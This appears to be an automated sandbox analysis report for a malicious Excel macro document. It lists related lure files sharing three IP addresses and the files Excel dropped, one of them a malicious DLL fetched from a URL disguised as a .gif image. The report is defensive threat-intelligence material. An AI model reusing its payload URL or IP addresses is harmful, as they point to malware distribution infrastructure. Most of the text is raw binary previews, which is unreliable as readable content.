	Documents_460000622_1464906353.xls	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xls	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xls	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	Invoice copyt2.pps	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	Invoice copy.ppt	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	Invoice copy.ppt	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	Scan emco Bautechni specification.pps	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	Scan emco Bautechni specification.pps	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	Notice-039539.xlsm	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	document-1245492889.xls	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	Notice-039539.xlsm	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	PO#070421APRIL-REV.ppt	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	document-1251000362.xlsm	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	document-1251000362.xlsm	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	FARASIS.xlsx	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	NEW LEMA PO 652872-21.ppt	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173
	document-1055791644.xls	Get hash	malicious	Browse	162.251.80.27 67.222.38.97 173.201.252.173

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 58596 bytes, 1 file
Category:	dropped
Size (bytes):	58596
Entropy (8bit):	7.995478615012125
Encrypted:	true
SSDEEP:	1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5:	61A03D15CF62612F50B74867090DBE79
SHA1:	15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256:	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512:	5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............\|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>..V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..\|0.+?.`-../.xvy..e......w.+^...w\|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g\|.z..+.D8.m..F .h............ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.1292511123011737
Encrypted:	false
SSDEEP:	6:kKbskwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:TskwTJrkPlE99SNxAhUe0ht
MD5:	707820142FEC93D4A9181720563CA6F6
SHA1:	63718086D52C7FB6A5C0500EEDAC35C7EC7884FA
SHA-256:	BBC9B2A78DB804F388D8DFC00AC497078DCAAF65596EF9E421C2F1D0E62E6E6E
SHA-512:	87FD2F572286C99DBE1F6872E01D1F22CFBA69EE899767A3B5DC2610850EDBB5E85998A211A03C2C6A889EECD9DAF4FD428DDF255FEBB92F696C0047D21D6850
Malicious:	false
Reputation:	low
Preview:	p...... ........`,...-..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.0215269645321685
Encrypted:	false
SSDEEP:	3:kkFklmz+tfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKZSnliBAIdQZV7eAYLit
MD5:	71193B3BAF93BDC3A9212B0071ACDD1A
SHA1:	6399E24C56A4DDFEDC67AEEFE39A13DEA1B8956E
SHA-256:	4F8D286DDAEDC755D9B4F8AB63EB8BF69F9D41D70EDF3CACBE28B6E111D6A8BD
SHA-512:	5EE85F20C73669ECA5399AF42B50F044CFFAF06DBCA4E4DCB2FD8FBCF9730D02913FA7D158F3465851636A155BFBCAAF04052AF08F311036C58C542FE27791BE
Malicious:	false
Reputation:	low
Preview:	p...... ....`........-..(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0604[1].gif Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32+ executable (DLL) (native) x86-64, for MS Windows
Category:	downloaded
Size (bytes):	185404
Entropy (8bit):	6.206741223040736
Encrypted:	false
SSDEEP:	1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo
MD5:	7D7BDC559AE699579A700645D0FD5F03
SHA1:	C4C0CA6B2B7779D870B0B69E5D7001453BABBFF0
SHA-256:	0A0B3D91698A46D409791D4DD866E56DDD70F91A3F1D4557A0CB2899BDA1E524
SHA-512:	3A815F4CEE13B0D491E6C527D30DB0FB9E77FB489F606539E8026A3C2797A3A52672378B9B0788C5DFD5953ECB11D1BA5F2AE30F493CDBBB42A49E42E4278016
Malicious:	true
Reputation:	low
IE Cache URL:	https://shalombaptistchapel.com/ds/0604.gif
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................Rich..........PE..d..._.p`.........." ......................................................................`.....................................................<...................................0...................................................0............................text............................... ..`.rdata..@...........................@..@.data...............................@....pdata...............~..............@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3318F1C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8301
Entropy (8bit):	7.970711494690041
Encrypted:	false
SSDEEP:	192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
MD5:	D8574C9CC4123EF67C8B600850BE52EE
SHA1:	5547AC473B3523BA2410E04B75E37B1944EE0CCC
SHA-256:	ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
SHA-512:	20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.\|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI\|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....\|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>\|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD5EEF8A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	848
Entropy (8bit):	7.595467031611744
Encrypted:	false
SSDEEP:	24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
MD5:	02DB1068B56D3FD907241C2F3240F849
SHA1:	58EC338C879DDBDF02265CBEFA9A2FB08C569D20
SHA-256:	D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
SHA-512:	9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm\|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY.^......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5BD2603.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 364 x 139, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	8854
Entropy (8bit):	7.949751503848125
Encrypted:	false
SSDEEP:	192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj
MD5:	780FD0ABF9055E2D8FA1BAB6D4B9163E
SHA1:	CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE
SHA-256:	6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2
SHA-512:	8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A
Malicious:	false
Preview:	.PNG........IHDR...l.........E..7....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<.."#IDATx..]M.$.u.Y...V.Z!$......C.H2>.....JBR....c.2..k....'.f......qg..7O.W..0.'.bO6x...l..#!W...`h.~......Y...+..._.x.".....#.....[........C.ISj..i..i.peOD..BT.N....IoD..qS..M{.I.D...!...[."A....GM........I.M......'T#D....&Q.H.."...Cqn"l....&.G.Mo....MI......u&.~.#k............R...<Q7%o~}.$d..L..j.<l..<...N.K.M"l.aU...G,N...v....LE..Y@.l....;n.?.Z%.&.V.....,.d".K^bM..B. ....B.l"l.a.....<...q...."K.....{.,...j.&...F.@xU......i.q..R.`u#<...........mR...j+ ..^.x...1TR..qw"l....&.a.W...}v.......S.zT..a...J.0....5... E..i"l.a%..<............lSM.a...N.........hI....."D...R.u....."Q.K.#.gM)}.L.....b..D.y9{.kR7aA....:_..LL#......M...).{.l..O..lv...lP0l+....Y.Y.5.....j@$.C.h!qy/.D..%...g.c...D.......X..M$O.v%Z..S.%w..1"l....B'.O.I..B..}.............iL...X..3..`[.g...j..J.'...Y...rr..@m....@.uC.#......e!.4...M.a.y.......&h.o...Y.Q...@....N]6..."H.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E2456C6D.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	557
Entropy (8bit):	7.343009301479381
Encrypted:	false
SSDEEP:	12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
MD5:	A516B6CB784827C6BDE58BC9D341C1BD
SHA1:	9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
SHA-256:	EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
SHA-512:	C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
Malicious:	false
Preview:	.PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0\|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.\|.-P#P;..p._.......jUG....X........IEND.B`.

C:\Users\user\AppData\Local\Temp\98CE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	98202
Entropy (8bit):	7.866058990234764
Encrypted:	false
SSDEEP:	1536:FRo2bdyZco+SkWShnt2hawGW7qusD9Byrty30wEGttZv9xEfYWc:FRo2bMKjSYhtMGW7qfD9ByrtyOG7ZVxP
MD5:	7F605B6A3EFBFB484A8BE3F8456A8D2B
SHA1:	612A9CACC2DC706EDD6E4E5471644E2F50680AD1
SHA-256:	903EE7F7201D29FF4440863AB646255C9FA20A58ADB6D14558DBFF3D0DF3D08C
SHA-512:	D616302A62256345DD558CAFA8A356ABB7A17BD30455ED90436D2650FE9431F53B147F1D84C3E0DDB037A7BE1A16AD4FB97BA9547073BFC60CFFAE77E37DD683
Malicious:	false
Preview:	.U.n.0....?..........C....I?.&..an.0.........,.\.Qo.7.pz.........7.V..^i......;.0.....Z..d../g..u....e}J...({........G+....!...~1.\|.....)s....,.I...o..c...{Y.e"...Hd..;.#R..BKP^.Y.n0D..{.dM..&.x.)Qa..^...Mm...\|?".....!......u.......r8.........Z..GXJ.....q9.~..'.aZ.a%.4%.......s..&.{txD. ....../?..........`.:nN6..?..XF.../>S..y[..r....F....1......!.S.E.u.h~t.n.9.....C......>...az.}@...^.....:...a;....."M....l..w..j.6/...?.......PK..........!.\lC.............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CabD911.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 58596 bytes, 1 file
Category:	dropped
Size (bytes):	58596
Entropy (8bit):	7.995478615012125
Encrypted:	true
SSDEEP:	1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5:	61A03D15CF62612F50B74867090DBE79
SHA1:	15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256:	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512:	5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious:	false
Preview:	MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............\|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>..V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..\|0.+?.`-../.xvy..e......w.+^...w\|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g\|.z..+.D8.m..F .h............ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.

C:\Users\user\AppData\Local\Temp\TarD912.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.309740459389463
Encrypted:	false
SSDEEP:	1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
MD5:	4E0487E929ADBBA279FD752E7FB9A5C4
SHA1:	2497E03F42D2CBB4F4989E87E541B5BB27643536
SHA-256:	AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
SHA-512:	787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........\|h....210303062855Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Apr 9 22:25:36 2021, atime=Fri Apr 9 22:25:36 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.468010280652782
Encrypted:	false
SSDEEP:	12:85Ql+XnCLgXg/XAlCPCHaXgzB8IB/RxoUSxX+WnicvbVbDtZ3YilMMEpxRljKxTg:85U/XTwz6IvgxYetDv3qkrNru/
MD5:	6B3FA05E8373DEEAB5706DEF1D20E84F
SHA1:	460665822C0D0E772D12C0EDFC92CD8E7F65A479
SHA-256:	DF1A899071BDF4C8E0741433AECBF4AD43374690DA756A1DC11FB2C02D26D67E
SHA-512:	E6EA9596EDA0654601DFCC94B7C6238D2FF436593B7DFE0A1D71D861DDF1A41E41D83C8E76AE4D5DDFCC40317A21EC8C86CC1C7DA55C51F9D8FABE7E6054558D
Malicious:	false
Preview:	L..................F...........7G...j[..-...j[..-...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......R3...Desktop.d......QK.X.R3...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\138727\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......138727..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\documents-1819557117.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Fri Apr 9 22:25:36 2021, atime=Fri Apr 9 22:25:36 2021, length=98202, window=hide
Category:	dropped
Size (bytes):	2138
Entropy (8bit):	4.536564479026972
Encrypted:	false
SSDEEP:	24:8D/XTwz6IknoGK90heZK9UDv3qkdM7dD2D/XTwz6IknoGK90heZK9UDv3qkdM7dV:8D/XT3IkokhHkQh2D/XT3IkokhHkQ/
MD5:	D2547ECACC5A6A0200D2D4315B9F1B8B
SHA1:	DBF3D25F98B1D0773B68A44C59500BD06E09AA64
SHA-256:	AA0BF05DEC7E5CB1C4EDA8D34261A99A43396DAACA5030794BCA0C10C16EF60C
SHA-512:	8EE54F76E89A82555BD4A5063797457A32DBEAC09A0E3BF6E01CE798DF74F6D1B2304CF4F93194082A9CFFB6FD603590A5418350A43427D63D4C90D1280693BF
Malicious:	false
Preview:	L..................F.... .......{...j[..-..:.d..-...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\|.2......R0. .DOCUME~1.XLS..`.......Q.y.Q.y...8.....................d.o.c.u.m.e.n.t.s.-.1.8.1.9.5.5.7.1.1.7...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\138727\Users.user\Desktop\documents-1819557117.xlsm.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.s.-.1.8.1.9.5.5.7.1.1.7...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......138727.........

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	115
Entropy (8bit):	4.66882021623009
Encrypted:	false
SSDEEP:	3:oyBVomxWKS9LRng9CZELRng9CmxWKS9LRng9Cv:dj49LJQgELJQC9LJQs
MD5:	359F4F243B208E2F7BEC4696161C1C56
SHA1:	2EC141564445F34EA03BB20E2F8237AEB9D50C00
SHA-256:	7FEFA1E5026005C1DBE4548936836F0817E4EEEC59595287FBA1CE9208CE2632
SHA-512:	4B54C65A070E885723625AE74B2C8A69FE84783FFE9F33748BDF284DE7D0547462C951228CEFBB1DE35B21BF06C982FCE1120C486DA6ABBA1F98F8B8150E70F8
Malicious:	false
Preview:	Desktop.LNK=0..[misc]..documents-1819557117.LNK=0..documents-1819557117.LNK=0..[misc]..documents-1819557117.LNK=0..

C:\Users\user\Desktop\69CE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	98202
Entropy (8bit):	7.866058990234764
Encrypted:	false
SSDEEP:	1536:FRo2bdyZco+SkWShnt2hawGW7qusD9Byrty30wEGttZv9xEfYWc:FRo2bMKjSYhtMGW7qfD9ByrtyOG7ZVxP
MD5:	7F605B6A3EFBFB484A8BE3F8456A8D2B
SHA1:	612A9CACC2DC706EDD6E4E5471644E2F50680AD1
SHA-256:	903EE7F7201D29FF4440863AB646255C9FA20A58ADB6D14558DBFF3D0DF3D08C
SHA-512:	D616302A62256345DD558CAFA8A356ABB7A17BD30455ED90436D2650FE9431F53B147F1D84C3E0DDB037A7BE1A16AD4FB97BA9547073BFC60CFFAE77E37DD683
Malicious:	false
